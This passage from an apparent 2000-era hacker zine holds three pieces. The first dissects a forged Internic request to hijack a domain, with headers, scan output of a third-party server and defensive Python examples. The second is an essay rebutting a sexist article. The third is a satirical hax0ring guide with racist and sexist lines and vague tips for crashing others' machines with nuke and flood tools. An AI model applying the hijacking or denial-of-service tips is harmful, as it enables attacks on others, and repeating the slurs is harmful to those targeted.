>5e. Street Address..................: 1458 Gate St.
>5f. City............................: Saint Mary
>5g. State...........................: MD
>5h. Postal Code.....................: 20618
>5i. Country.........................: USA
>5j. Phone Number....................: 401-597-0588
>5k. Fax Number......................:
>5l. E-Mailbox.......................: vision@HUNGRY.COM
>
>Billing Contact

How nice of them, leave me the bill

>6a. NIC Handle (if known)...........: MV777
>6b. (I)ndividual (R)ole?............: Individual
>6c. Name (Last, First)..............:
>6d. Organization Name...............:
>6e. Street Address..................:
>6f. City............................:
>6g. State...........................:
>6h. Postal Code.....................:
>6i. Country.........................:
>6j. Phone Number....................:
>6k. Fax Number......................:
>6l. E-Mailbox.......................:
>

These are the nameservers they intended to use in the hijacking
The IP addresses resolve to

>Prime Name Server
>7a. Primary Server Hostname.........: S-CLUB.4MG.COM
>7b. Primary Server Netaddress.......: 209.210.67.126
>
>Secondary Name Server(s)
>8a. Secondary Server Hostname.......: S-CLUB.4MG.COM
>8b. Secondary Server Netaddress.....: 209.210.67.126
>
>
>END OF AGREEMENT
>
>
>For instructions, please refer to:
>"http://www.networksolutions.com/help/inst-mod.html"

The trail of evidence is overwhelming.
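The header reading walked through in the annotated message above, as an added Python example (not code from Max Vision's paper or from HWA): it parses the Received chain and separates what each relay recorded from the TCP connection (bracketed IP, reverse DNS) from what the sender merely claimed (HELO name, From address). The sample headers are transcribed from the quoted message; the function names and the two-label domain comparison are assumptions of this example.

```python
import ipaddress
import re

# Headers transcribed from the forged message quoted above. The "for <...>"
# recipients that the page's copy lost are left out, and the From address is
# taken from the envelope "From " line (assumption: both carried the same one).
SAMPLE = """\
Received: from rs.internic.net (bipmx2.lb.internic.net [192.168.120.15])
        by opsmail.internic.net (8.9.3/8.9.1) with SMTP id RAA28490;
        Sun, 2 Jan 2000 17:17:05 -0500 (EST)
Received: (qmail 6410 invoked from network); 2 Jan 2000 22:17:05 -0000
Received: from relaye.gateway.net (HELO smtp9.gateway.net) (208.230.117.253)
        by 192.168.119.15 with SMTP; 2 Jan 2000 22:17:05 -0000
Received: from HUNGRY.COM (98C9A0CE.ipt.aol.com [152.201.160.206])
        by smtp9.gateway.net (8.9.3/8.9.3) with ESMTP id RAA13460;
        Sun, 2 Jan 2000 17:17:03 -0500 (EST)
From: Max Vision <vision@HUNGRY.COM>
"""

# sendmail style: from <HELO name> (<reverse DNS> [<peer IP>]) by <server>
SENDMAIL = re.compile(r"from\s+(?P<helo>\S+)\s+\((?P<rdns>\S+)\s+"
                      r"\[(?P<ip>[0-9.]+)\]\)\s+by\s+(?P<by>\S+)")
# qmail style: from <reverse DNS> (HELO <HELO name>) (<peer IP>) by <server>
QMAIL = re.compile(r"from\s+(?P<rdns>\S+)\s+\(HELO\s+(?P<helo>\S+)\)\s+"
                   r"\((?P<ip>[0-9.]+)\)\s+by\s+(?P<by>\S+)")


def unfold(raw):
    """Return [(name, value)] with folded continuation lines joined."""
    headers = []
    for line in raw.splitlines():
        if line[:1] in (" ", "\t") and headers:
            name, value = headers[-1]
            headers[-1] = (name, value + " " + line.strip())
        elif ":" in line:
            name, value = line.split(":", 1)
            headers.append((name.strip().lower(), value.strip()))
    return headers


def parse_hop(value):
    """Parse one Received value; None for lines without a peer (qmail's
    'invoked from network' bookkeeping line, for instance)."""
    m = SENDMAIL.match(value) or QMAIL.match(value)
    if not m:
        return None
    hop = m.groupdict()
    hop["ip"] = ipaddress.ip_address(hop["ip"])
    return hop


def site(name):
    """Last two DNS labels, lower-cased. Naive on purpose: production
    tooling should use the Public Suffix List (example.co.uk and the like)."""
    return ".".join(name.lower().rstrip(".").split(".")[-2:])


def analyze(raw):
    headers = unfold(raw)
    hops = [h for h in (parse_hop(v) for n, v in headers if n == "received") if h]
    findings = []
    for hop in hops:
        if hop["ip"].is_private:
            # RFC 1918 peer: an internal relay, not the Internet-facing sender.
            findings.append(("internal-hop", str(hop["ip"])))
        if site(hop["helo"]) != site(hop["rdns"]):
            # HELO is typed by the client; the IP and its reverse DNS are
            # recorded by the receiving server from the connection itself.
            findings.append(("helo-mismatch", str(hop["ip"])))
    # Each server prepends its header, so the last public hop is the earliest.
    # It is only as trustworthy as the relay that wrote it; lines below the
    # first relay you trust can be fabricated by the sender.
    public = [h for h in hops if not h["ip"].is_private]
    origin = public[-1] if public else None
    from_value = next((v for n, v in headers if n == "from"), "")
    m = re.search(r"@([A-Za-z0-9.-]+)", from_value)
    from_domain = m.group(1) if m else None
    return {
        "hops": hops,
        "origin": origin,
        "findings": findings,
        # False here is exactly why MAIL-FROM style checks prove nothing.
        "from_matches_origin": bool(origin and from_domain and
                                    site(from_domain) == site(origin["rdns"])),
    }


if __name__ == "__main__":
    report = analyze(SAMPLE)
    o = report["origin"]
    print("origin:", o["ip"], o["rdns"], "claimed HELO", o["helo"])
    for kind, ip in report["findings"]:
        print(kind, ip)
    print("From domain matches origin:", report["from_matches_origin"])
```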
Here is the breakdown, then I'll discuss each element:

  - attacker, using an AOL.COM IP address, sent forged email using GATEWAY.NET mail relay. This is known to be true, since the networksolutions.com mail server (rs.internic.net) is resistant to TCP spoofing, as is relaye.gateway.net.
  - the AOL.COM address was inactive, so they must have disconnected immediately after sending the forged email (AOL absolutely does not care *at all* about this, and all attempts to reach the abuse or security teams of AOL, Gateway.NET, and Internic have yielded no reply. NO WONDER.)
  - the contact information was all false. The only point of control that the attacker gets is the DNS service. If the attacker intended Denial of Service, then they might not have control of the Linux DNS server. If the attacker intended control of the domain, then they either own/operate the Linux DNS server, or they have rooted the machine.
  - The Linux DNS server is a freeservers.com webhosting server - when the HTTP/1.1 hostname s-club.4mg.com is used, the following webpage appears (indicating that they do have control of the linux server, and that they intended to hijack my domain and Nokia's):

Internic's mail server is not vulnerable to TCP spoofing, which indicates that the header information is valid - that a mail really did reach their servers from the relay host, relaye.gateway.net.

not spoofed: rs.internic.net

rs.internic.net (198.41.0.6)
TCP Sequence Prediction: Class=truly random
                         Difficulty=9999999 (Good luck!)
Sequence numbers: 3763161D 84916A9 979391FC 660A454A 4D3417E0 5DD7DB3B

relaye.gateway.net is also not vulnerable to TCP spoofing, which indicates that the header information is valid - that a mail really did reach their servers from the attacker, 98C9A0CE.ipt.aol.com [152.201.160.206].
not spoofed: mail relay host

relaye.gateway.net (208.230.117.253):
TCP Sequence Prediction: Class=random positive increments
                         Difficulty=50749 (Worthy challenge)
Remote operating system guess: BSDI BSD/OS 3.0-3.1

Based on this information, the likelihood of the email being truly forged (at the packet level) is extremely low. This appears to be a straightforward application-level forgery from the AOL account.

Having a look at the DNS server that the attacker was trying to substitute for mine, to control the domain, we see it is an older Linux system that is acting as a virtual webserver. I have contacted the rightful administrators of the system about the attempted attack.

overview: substitute dns server

FreeServers.com - www26 Server
Provo, Utah - USA

www26.freeservers.com (209.210.67.126):
Port    State       Protocol  Service
21      open        tcp       ftp
23      open        tcp       telnet
25      open        tcp       smtp
37      open        tcp       time
80      open        tcp       http
111     open        tcp       sunrpc
113     open        tcp       auth
513     open        tcp       login
514     open        tcp       shell
2049    open        tcp       nfs
3306    open        tcp       mysql

TCP Sequence Prediction: Class=truly random
                         Difficulty=9999999 (Good luck!)
Remote operating system guess: Linux 2.0.35-37

HOW TO DEFEND YOURSELF

Internic offers three authentication methods for domain administrators: MAIL-FROM, CRYPT-PW, and PGP. Each can be used to effectively protect against this type of hijacking effect, each with increasing levels of effectiveness. The following are summaries that discuss how each is used. After each description I'll briefly discuss their vulnerabilities.

MAIL-FROM

MAIL-FROM is the most basic type of authentication scheme. Under this level of protection, Network Solutions will verify that a Domain Name Registration Agreement, Contact Form or Host Form was submitted from the e-mail address, as listed in our database, of the administrative or technical contact of the record to be changed.
MAIL-FROM checks to see that requests to update your contact record -- or any record that you are associated with -- are sent from the current E-mail address of the contact. By default, all the contacts in the database have MAIL-FROM protection unless they have used the Contact Form to associate their contact record with a PGP key or an encrypted password. MAIL-FROM is the default authentication scheme. If you are not sure which of the three options to select, choose MAIL-FROM - it is the default.

MAIL-FROM is the default, and weakest security level. Don't follow their advice, use CRYPT-PW at the minimum.

CRYPT-PW

In the protection hierarchy, encrypted password, or CRYPT-PW, is the next highest level of protection for a domain name registration record. CRYPT-PW allows updates to be submitted from any e-mail address, and, if the correct password is supplied, Network Solutions will process the Domain Name Registration Agreement, Contact Form or Host Form.

If you would like to guard your contact record -- and any other database records that you are a contact for -- with a password, enter the plain text of the password in the box below. After you enter the password in the box below it will be encrypted and entered on the form in the correct place. Enter the password a second time to verify that you have entered the plain text of the password correctly. Do not lose this password. Updates to database records may be significantly delayed if this password is lost.

CRYPT-PW is a more secure authentication mechanism, as it requires the use of the correct password to effect a domain change. This may be exceedingly difficult to guess, as Internic may have anti-password-guessing measures in place to curb endless "guesses".

PGP

Pretty Good Privacy provides the highest level of security. PGP is an encryption and digital signature scheme. While 100% security can never be guaranteed, PGP is a very safe scheme.
In order to use PGP as your authentication scheme, the PGP software must be installed on your computer. This software is available both commercially and as freeware.

If you wish to protect your contact record -- and all records that you are a listed contact for -- with Pretty Good Privacy encryption software, choose this option.

IMPORTANT: You must obtain the PGP software and install it on your computer before you can use this security feature. PGP is available commercially and as shareware. To find out more about getting started with PGP, read our help files on how to obtain and install PGP. Your PGP key MUST be added to the Network Solutions' key server before you can use the Contact Form to associate a PGP public key with this contact.

Enter the key ID of your PGP public key in the box below. If you have installed the PGP software on your machine but you do not know your key ID, type: pgp -kvc on your local machine to discover the eight digit key ID of your PGP key.

IMPORTANT: If you have selected PGP, keep in mind that when the contact template is generated and E-mailed to you, you must FIRST sign the update request with your secret PGP key before sending the contact template to Network Solutions.

PGP is the strongest security level, as it is virtually impossible for an attacker to guess the correct private key. PGP is widely held to be one of the more secure/trusted forms of encryption/authentication.

There are also settings for "Notification Levels" for updates or usage. If an attacker is aware of this, they can forge the request email, and then forge an additional ACK email.

Notification Levels

The administrative and technical contact/agent will each choose when they would like to be notified to validate a Domain Name Registration Agreement, Contact Form or Host Form. The options they can choose from are: BEFORE-UPDATE; AFTER-UPDATE; and NOT-CARE. The administrative and technical contacts are not required to choose the same option.
Network Solutions will act upon the first reply we receive.

If the contact selects BEFORE-UPDATE, Network Solutions will send a confirmation request before any changes are made, even if the request was received from an authorized source. The contact then has the opportunity to acknowledge the validity of the request by replying "ACK" or "YES" to the notification. If the contact does not agree with the change request, replying "NAK" or "NO" to the notification will prevent any changes from being made. Selecting BEFORE-UPDATE may delay legitimate changes while Network Solutions waits for approval to make the requested change.

If the contact selects AFTER-UPDATE, Network Solutions will send a confirmation request after changes have been made. Even if AFTER-UPDATE is the selected level of protection, Network Solutions will only process a Domain Name Registration Agreement, Contact Form or Host Form if it was received from an authorized source, or if the registrant gives its express written permission to make the requested change. Both the administrative and technical contacts have the opportunity to acknowledge the validity of the request by replying "ACK" or "YES" to the notification. If either one of the contacts does not agree with the change request, replying "NAK" or "NO" to the notification will usually reverse any changes that were made. AFTER-UPDATE is the default option if no other type of notification is selected.

If the contact selects NOT-CARE, Network Solutions will never send a confirmation to that contact. By choosing this option, the contact establishes that they are not concerned about whether or not authorized changes are made to any domain name registration, contact record or host record with which he is associated.

As stated above, MAIL-FROM is not really enhanced with the BEFORE-UPDATE feature, as an attacker could forge a corresponding ACK message.

CONCLUSION

There are some serious security issues with the current Internic Guardian system.
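
The three authentication schemes and three notification levels described above, modelled as an added example (not Network Solutions' code and not part of the original article) to show what each combination actually verifies and which records an audit should flag. The record fields, the constructed sample contacts, the salted SHA-256 password hash and the rule that a confirmation reply is checked with the contact's own scheme are assumptions.

```python
import hashlib
import hmac
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass
class Contact:
    handle: str                        # constructed handle, not a real record
    email: str
    auth: str = "MAIL-FROM"            # default scheme, per the text above
    notify: str = "AFTER-UPDATE"       # default notification level, per the text
    pw_hash: Optional[str] = None      # "salt$hexdigest", CRYPT-PW only
    pgp_key_id: Optional[str] = None   # eight-digit key ID, PGP only


@dataclass
class Message:
    from_header: str                       # set by whoever sends the mail
    body: str = ""
    password: Optional[str] = None         # plaintext supplied with the form
    verified_signer: Optional[str] = None  # key ID of a signature that verified


def hash_password(password: str, salt: str) -> str:
    """Assumption: salted SHA-256 stands in for the registrar's password hash."""
    digest = hashlib.sha256((salt + password).encode()).hexdigest()
    return f"{salt}${digest}"


def authenticate(contact: Contact, msg: Message) -> bool:
    """True if msg satisfies the scheme guarding this contact record."""
    if contact.auth == "MAIL-FROM":
        # The only evidence is a header that the sender fills in.
        return msg.from_header.strip().lower() == contact.email.lower()
    if contact.auth == "CRYPT-PW":
        # Any sending address is allowed; the password is what counts.
        if not (contact.pw_hash and msg.password):
            return False
        salt = contact.pw_hash.split("$", 1)[0]
        candidate = hash_password(msg.password, salt)
        return hmac.compare_digest(candidate, contact.pw_hash)
    if contact.auth == "PGP":
        return bool(contact.pgp_key_id) and msg.verified_signer == contact.pgp_key_id
    return False


def process_update(contact: Contact, request: Message,
                   reply: Optional[Message] = None) -> str:
    """Outcome of an update request under the contact's notification level."""
    if not authenticate(contact, request):
        return "rejected"
    if contact.notify == "BEFORE-UPDATE":
        # Assumption: the confirmation reply is checked with the same scheme.
        if reply is None or not authenticate(contact, reply):
            return "pending"
        answer = reply.body.strip().upper()
        if answer in ("ACK", "YES"):
            return "applied"
        if answer in ("NAK", "NO"):
            return "cancelled"
        return "pending"
    # AFTER-UPDATE notifies once the change is made; NOT-CARE never notifies.
    return "applied"


def audit(contact: Contact) -> List[str]:
    """Findings a domain contact should act on for this record."""
    findings = []
    if contact.auth == "MAIL-FROM":
        findings.append("MAIL-FROM: only the From header is checked; "
                        "switch to CRYPT-PW or PGP")
        if contact.notify == "BEFORE-UPDATE":
            findings.append("BEFORE-UPDATE adds little under MAIL-FROM: "
                            "the ACK is checked the same way as the request")
    if contact.notify == "NOT-CARE":
        findings.append("NOT-CARE: the contact is never told about changes")
    return findings


def demo() -> Dict[str, str]:
    """Constructed records, each sent mail carrying only a matching From header."""
    owner = "admin@example.com"
    request = Message(from_header=owner)
    ack = Message(from_header=owner, body="ACK")
    contacts = [
        Contact("EX1", owner, "MAIL-FROM", "BEFORE-UPDATE"),
        Contact("EX2", owner, "CRYPT-PW", "BEFORE-UPDATE",
                pw_hash=hash_password("constructed-password", "ab")),
        Contact("EX3", owner, "PGP", "AFTER-UPDATE", pgp_key_id="0A1B2C3D"),
    ]
    return {c.handle: process_update(c, request, ack) for c in contacts}


if __name__ == "__main__":
    for handle, outcome in demo().items():
        print(handle, outcome)
```

Only the MAIL-FROM record accepts mail that proves nothing beyond its From header, and BEFORE-UPDATE does not change that outcome; the CRYPT-PW and PGP records reject the same mail.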
Domain Hijacking is as easy as ever, and many newbie crackers have been actively using this attack to hijack website addresses. Over the Y2K weekend it was rumored that several large sites suffered from this attack. If you are a domain contact and have not set encryption authentication options such as CRYPT-PW or PGP, then DO SO NOW!

Max Vision

@HWA

56.0 "A well known but overlooked threat to Hackers: Themselves"
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.hackernews.com/bufferoverflow/00/threat.html

In response to "Scene Whores" HNN buffer overflow article:

A Well Known But Overlooked Threat to Hackers: Themselves
By: Carole Fennelly

The recent HNN article "Scene Whores" by Erik Parker was advertised as "controversial". There is a fine difference between "controversy" and "shock tactics". The first is intended to provoke discussion to reveal opposing sides of an issue. The second is intended to provoke outrage for the purposes of cheap publicity. I work in a city that is home to more radio "Shock Jocks" than any other. I am, unfortunately, well aware of the dangers of falling into the trap of responding to such tactics. For any who really believe the emotional and sexist ramblings of that article: no one will change your mind - and that is, indeed, unfortunate. For the others who just view it as harmless babble, I intend to prove that it is, indeed, harmful.

The article promises to reveal an overlooked threat to hackers. It delivers nothing more than the emotional outburst of someone who was jilted. It should probably be simply dismissed for the immature rambling that it is. I cannot do so. Not because I am a woman - because I am a security professional who will not let pass an article that endorses FUD (Fear, Uncertainty and Doubt). This may not have been the intent, but it was the result.

In this article, Mr.
Parker comes to the conclusion that Scene Whores are female and hackers are male:

"I will always refer to woman as the scene whores, and use 'she' when speaking about scene whores. The reasoning behind this is, the majority of hackers are men."

One passage brought to mind a scene in Dr. Strangelove where the general warns that women steal "our precious bodily fluids":

"They are a real threat. They waste our time, ruin friendships, cause chaos between hackers, and generally ruin periods of our life"

What the article succeeded in doing was to reinforce the stereotype that women have only one purpose in the technical world - sex. Further, it supports the medieval belief that women are evil and must be kept in their place:

"Hopefully we can start identifying scene whores quicker, and securing ourselves against them quicker, and put them out of commission."

I guess the next Defcon Event will be The Scene Whore Trials.. followed by burning them at the stake.

Since the only method suggested to determine who these evil Scene Whores are is one of gender, all women must be guilty:

"Now the hard part is.. To determine which ones aren't scene whores. The ones who have been with other hackers, but are true and honest, and like you for who you are. I can't say the best way to determine this. I think it is easier to just try and detect the scene whores, and eliminate them, than to try and find a way to detect non-scene whores, if that makes any sense to you."

No, it does not make sense..

Hackers were not let off the hook of stereotyping either and the image of the "drugged out hacker" was also reinforced - along with gratuitous ego-feeding:

"We are a rare species I suppose, we are in an age where we wear what we want, we don't necessarily need a college background, we are making 6 digit figures, and setting the rules for our selves. Anyway you look at it, scene whores can look and think that we have power, money, and we are the stereo typed "cool".
Some of us are all of the above, and into drugs, and many girls find drugs to be an attractive feature."

The problems of stereotyping

The hacker community should be well aware of the handicap of a stereotyped image. A parody of this is on 2600:

http://www.2600.com/hacked_pages/prop/prop_pages/2600/hax0r.html

Of particular interest is:

"Also, all hax0rs are racist, sexist, apocolyptic bastards, so support your local redneck crackhead klan or whatever you call the kkk. Never ever forget to refer to women as pussy and remember you can buy love (ie prostitution; because sex and love are exactly the same thing."

Several pioneers in the hacking community are to be commended for their efforts in overcoming these stereotypes. Most notably, the L0pht has had zero tolerance for the media portraying hackers as malevolent criminals intent on destroying computer systems. How did this stereotype come to exist in the first place? The simple truth is hard to swallow: there were (and still are!) hackers who destroy systems.

In an effort to make a distinction between criminal hackers and "harmless" hackers, all sorts of euphemisms were employed like "white hat hackers" and "black hat hackers". Today, the politically correct term for criminal hackers is "crackers". It seems that whenever an undesirable group tarnishes the name of "hackers", a new term is invented. A prime example of this is the recent CDUniverse extortion story.

http://www.wired.com/news/technology/0,1282,33563-2,00.html
http://www.zdnet.com/zdnn/stories/news/0,4586,2420863,00.html?chkpt=zdnntop

In the above articles the point is made that the extortionist is not a "hacker". He's a "Data thief", "intruder", "extortionist" or "cracker" - anything but a hacker. I'm sorry, but like it or not, he's a hacker. He may also be a crook, but he used computer skills to bypass a system's security. The fact that he used the results to commit a crime is separate, but doesn't change the fact that he's a hacker.
As a woman in technology, I don't have the luxury of claiming that women who behave badly are not women. I can't deny that they are women. What I can do is distinguish what they are from what they've done and treat them as the separate issues that they are. When you identify distasteful actions as being taken by "women", we are all tarred with the action - and all have to suffer the consequences. This is why I must object to the simplistic characterization of "scene whores" as women and "hackers" as men.

To understand the term "Scene Whore", let's separate the components of the term.

Whore

The term "whore" is defined by Webster's dictionary to mean "a woman who practices promiscuous sexual intercourse esp. for hire: PROSTITUTE"

The term "prostitute" has several definitions. The one that I think best fits is "a person who deliberately debases himself or his talents (as for money)"

The hacker community has labeled J.P. Vranesevich of AntiOnline a "scene whore" because it is felt that he sold out the hacker community for the sake of corporate backing. True or not, this attitude demonstrates that the hacker community defines a "scene whore" as a person who debases themselves for profit - not simply a person who has sex.

The Hacker Scene

The "scene" does indeed appear to be sexist - why else would there be a "Babes of Defcon" contest?

http://www.01grafx.com/html/babesofdefcon7.html

I cannot comment with authority on the hacker "scene" since I've never attended Defcon (specifically because of the atmosphere). Perhaps that is why it was so unfathomable to me why women at the Chaos Computer Club required their own "hacking room" (http://www.wired.com/news/women/0,1540,33346,00.html). Why would they choose to segregate themselves from the other hackers? Perhaps they sought an atmosphere where they would not be considered "meat". I do recall how difficult it was in 1980 to be the only female in many of my classes at Polytech (and the rumours that I slept with everybody).
Still, I would not like to attend a conference that would exclude my male friends.

A Well Known But Overlooked Threat to Hackers: Themselves

In the U.S., we have been conditioned to believe that we are not responsible for our actions. This is wrong. You are responsible for your own indiscretions and must suffer the consequences of your actions. This has nothing to do with "hacking" or gender or even age. We have had a clear demonstration of faulty judgement in President Clinton. Shouldn't a man who was a Rhodes scholar have known better than to seek cheap gratification with an intern? While she was portrayed as the "temptress", he can hardly cry "rape". It is insulting to men to suggest that they cannot show some self control.

If a hacker cannot show the self control to be wary of who they get romantically involved with - male or female - they deserve to suffer the consequences of their actions.

When a person claiming to be a hacker makes absurd statements, the reputation of all hackers is tarnished.

Carole Fennelly
Partner
Wizard's Keys Corp.
Security Columnist
Sunworld Magazine
fennelly@wkeys.com

@HWA

57.0 The complete guide to hax0ring.
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

(As mentioned in previous HNN buffer overflow article)

http://www.2600.com/hacked_pages/prop/prop_pages/2600/hax0r.html

Here it is, kids. The famed "Complete Guide to Hax0ring". Read it. Live it. Love it.

Picking a handle
By: DRiVE

In the famous words of joey " i need a handle ". This is true. Every great hax0r has a 31337 handle. I am going to help you pick the best one.

STEP ONE: find a handle that at least 70 other people have such as acid , demon , rave ,and thug.

STEP TWO: if you cant find one that alot of people have just make sure yours has alot of x's in it. That way people will really ph33r you .
I mean everyone knows that people with x's in their handles are the best at hax0ring gibsons, this is because when you log into a gibson it messes it up because UNIX for Win95 wasnt made to recognize x's. So dont have something that makes sense , instead of something like DOC try Xdocx or xDxOxCx. This will let people know you are 31137. STEP THREE: Make it scary. Not something simple that describes you or anything about you but something nasty like hellgod or deathbringer , you know just so people will think you are l<00L. STEP FOUR: Join a warez group or if you want to be really 31337 start your own i suggest the name W.M.A this stands for WaReZ MoBsTaS of AmErIcA ....this way everyone will know you listen to tupac and you are really in a gang and that if " Da TaLk SuM mO sHizNiT YoU Is gOnNa CoMe To Da HoUsE" then always ask for their address this will make them think you are going to come and shoot them. Anyways after you start you group make a rad ass tag to put on all your warez. Then send it out and this way people will know you are elite. I recomend sending a mass mail to tosemail1 , this waaay tosemail1 will tell all the guides not to fuck with you because you have a kick ass punter. STEP FIVE: after you have a cool ass handle go into all the 2600 newsgroups and post alot of messages asking for loops and how to jackpot atms this way people will know what you are talking about. STEP SIX: now you have all the respect you could ever want just go into phreak and tell them you and your boyz can sk00L them. Section 1: Getting Online By: Orin To get online from your house, you must first own a computer. You can find these at Garage Sales, Electronics Catalogs, or your friendly Radio Shack. Make sure to make it clear to the person you are purchasing the computer from that you are using it for hacking intentions. Once you have acquired a computer, check and see if it has a modem. 
A modem could be a small box with lights on it, and an outlet for a telefone jack, or a large telefone reciever on the back of your computer...Be careful, this fone may _only_ be used for calling other computers, and never for personal calls! Usually these fones are monitored by the police, so it would probably be your best bet to get an external modem, as there is no way the cops could listen in on an extension. Once you know you have a modem, you're close on your way to becoming a real hacker. The next thing you should do is get an account on America Online immediately; this is the hacker's playground, and you will meet many intelligent people there. To do this, it takes a little thinking. You should first get some AOL software. This is accomplished by going up to your friendly mailman and asking him for a complimentary AOL installation disk. The government gives mailmen these disks to pass out free to the public. Usually, the mailman will give you a short tutorial on the installation process (its widely known in the computer community that mailmen make the best hackers). After you have created your AOL account, it is important to think of a good Screen Name (see appendix for some suggestions). Now, you are almost there! Section 2: Looking Cool By Orin The most important thing about hacking is looking cool. If you look cool, people like you, and if people like you, you can fool them into letting you hax0r them. If they don't think you look cool, they're probably lamers anyway. Looking cool is accomplished by having a bad-ass attitude, and unique personal qualities like being a raver or a druggie. For instance, most people will think you are cool if you tell them you are female. They'll also think you're cool if you can make them ph33r you. But, the art of ph33r will come in later chapters, as it is an advanced hacking skill. 
Right now, just follow this simple rule of thumb for looking cool: Never talk about computers, and always throw in capital letters and numbers while typing. Oh and not to mention, in order to be a l33t0 hax0r j00 must be arrested at least several times, since being arrested can sometimes prove to be difficult. Try these methods. I. Pranking the FBI ahh yes a personal favorite of mine, pranking the FBI always a fun past time especially since they can't trace it or nothing. II. Hax0ring your way into ATM's Take a mini computer ( a name I do not know ) and attach it to the ATM (a method I do not know). You get this mini computer through the blackmarket. Then the way everything works is I don't know, but I sure got caught and I sure stole $ 4,000 and AND the authorities sure THREATENED me with computer probation *gasp*. I did it so long ago I don't remember the rest. If you don't believe me just ask DCY he knows everything because after all he is a 13 year old 7'2" hacker!!! III. Calling the police Now call the police and tell them you know about a drug dealing mafia super villian type that lives next door, then give them your address but make absoluely certain you have enough proof of your evil schemes, such as a to do list like so 1. Do dishes 2. Clean living room 3. Pick up groceries 4. Take over the world 5. Baby sit the neighbors kid 6. Torture neighbors kid 7. Kill neighbors kid 8. Hide neighbors kids body etc... etc... Also make sure to have plenty of your mind expanding drugs and such lying around so if all else fails they'll make sure to arrest you over these. On the off chance they refuse to, scream things like "Hack the Planet" and "Roswell! Where its at !!" Don't worry about making any sense, real hax0rs don't make sence and babble incoherently for hours on end (similar to the Unabomber's manifesto). 
Now that you have acheived l33tness by being arrested, you can brag about how you got arested and how the CIA, FBI, and PLO are after you (its common knowledge that the palastinian liberation organization have a great interest in bringing computer hax0rs to justice so they can cut your hands off thus denying you the ability to type well with your fingers at least which is why we included a guide to typing with your toes on the off chance you have already been captured by the PLO). Never ever forget to take pride in hax0ring the FBI and CIA with Fate X 9123213; this is very l33t and you should never hesitate to brag about your acomplishments. If somene says they do not believe you, hax0r there ass by punting them (covered more theroughly later on). Other ways to look |< |2 /\ [) include scrolling, mass mailings, punting, and lets not forget the power of ph33r, if you threaten to turn off everyones fone, cable, power, etc, they will ph33r you. When you say this, everyone will always take you seriously and will go out on there porch and sit in the rocking chair cradling there shotguns and drinking Jack Daniels waiting for you. Also, all hax0rs are racist, sexist, apocolyptic bastards, so support your local redneck crackhead klan or whatever you call the kkk. Never ever forget to refer to women as pussy and remember you can buy love (ie prostitution; because sex and love are exactly the same thing. Now, I may sound like I am being sarcastic but I assure you I am not, if you have any doubts in my l33tness ask CDJ he is very smart. (that left a bad taste in my mouth) The last way to look cool (and these are the only ways) is to claim your down with Kevin Mitnick, the mentor, or are a part of LOD. 
This contributes to how much people will ph33r you, but if they ask you any questions about them, either ignore them or be exceptionally vague becuase otherwise they won't take you serious, becuase real hax0rs never have facts they just say stuff like "Me and Kevin Mitnick are best friends, we hax0r Gibsons together". This will impress everyone and give you instant coolness, l33tness, and most importantly, make you look cool. Section 3: The art of ph33r by DoomBug Making People ph33r you doesn't come naturally. There is actually an art to it. To make people ph33r you, you MUST have a leeto burrito screen name first of all. (see appendix for some suggestions). Second you MUST ask question like "R there any good hax0rs here?!? Gimme a good Nua dial-up for Unix if u dare". Now that one is a MUST. Third, you will have to talk shit about people that call you a warez pup; when they do it, say something like "j0e m0mma!" then they will ph33r you also. Another helpful way to make people ph33r is getting out Fate X 99 1/2 and hax0ring away at AOL and hax0r chat rooms. Call people lame too.... See that wasn't hard at all, and people all ph33r you now. And NEVER EVER think you own sp0ck; ph33r sp0ck cause he owns YOU. Section 4: The art of "fucking" by Cirrus First, you must learn what you are trying to accomplish. If you have intentions to steal, break, or destroy, read no further. You can easily take over someones computer, (Well, ok, this is destructive) by obtaining thier IP address. Say, they are setting up an FTP server, or, just get them to tell you what it is. Now, you must get some kind of a program, and Ping them, to find out if the are lagging or not. Now, ( if they have an FTP ) you can kill there FTP by using a port fucker. Put it to "fuck" port 21 . If they don't have one, obtain a program called "WinNewk". That will just shut down thier computer to say the least, but, I will not get into how it works this time. 
You can also use a pinger, and ping the hell out of them, which can sometimes have the effect of a Nuke. Next time I will teach you how to clone a cellular fone with a pixy stick. Have fun!.. oh yeah, if I find out you were doing this shit to hurt something other than a Computer/Server/Host, like a teacher, or an old friend with a new PC, I will fucking beat your ass. Section 5: Advanced AOL Hacking Techniques by IMP After you have mastered basic |-|4><0|2ing skillz, you can move on to advanced methods. The first thing ya gots ta do to be a master |-|4><0|2 d00d is to go into a W4R3Z room and spend a minimum of 4238923487 hours a week in there until you have every version of Fate available, plus 9 or more gigs of pirated software. Now go into private room "Phreak" and offer to trade your W4R3Z for other W4R3Z. It's very 1337 to assume that people will ignore you when you only say it once, so a true |-|4><0|2 will scroll it about 13 times, and as you should know by now, all in caps or LeeT0 WaReZ FoNT. If 3 seconds go by and no one's responded in a positive manner yet, scroll it again, only this time try 2 dozen times to make sure you get your point across. And a true |-|4><0|2 always uses mucho punctuation. (ie: ANYONE WANNA TRADE QUACKE FOR DUCK NUKKEM?!??!?!?!?!!?!!) Now, often times if one of the lamerz who hang out in that room and ruin its general 1337ness happen to be there, they'll try to say some bullshit like "This isn't a warez room." Well, don't listen to them, use one of your many /<-Rad punters and show them who's 1337. Make sure you advertise the punter 10 or 20 times before actually trying to punt them, this way you'll make them scared and they'll probably apologize and stuff, which will make everyone else ph33r you. (See section 3) Occassionally when you try to punt them, you get an error message that says their ims are off. No one is sure why this happens, it's probably something wrong with aol. 
